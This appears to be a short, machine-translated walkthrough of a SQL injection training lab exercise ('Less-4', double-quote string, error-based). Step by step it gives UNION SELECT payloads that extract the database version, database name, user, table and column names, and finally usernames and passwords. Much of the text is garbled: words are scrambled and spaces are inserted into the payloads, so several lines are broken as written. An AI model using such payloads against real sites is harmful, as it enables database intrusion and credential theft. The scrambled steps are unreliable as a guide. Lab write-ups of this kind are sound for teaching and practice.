Less-4 GET - Error based -Double Quotes - String
1.原页面
2.?id=1
3.?id=1’
4.
‘ ‘’1\’’) LIMIT 0,1 ‘ --> ‘’1\’’) LIMIT 0,1
SQL:
Select login_name,password from admin where id =(“id”) limit 0,1
=. 1 5.id ") - +
6.?id=1") by 3- + Order
7. The version information database query
? ID = 0 "). 1 SELECT Union, Version (), 3- +
8. The database queries and username
? the above mentioned id = 0 ") of Union the SELECT 1, Database (), the user () - +
9. lookup table name
id = 0?") union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = ' Security '), User () - +
10. The column name query
id = 0 ") union select 1 , (select group_concat (column_name) from information_schema.columns where table_schema =?' security 'and table_name =' users'), 3-
11. queries the user name and password
? id = 0 ") union select 1, group_concat (username, 0x3a, password), 3 from users- +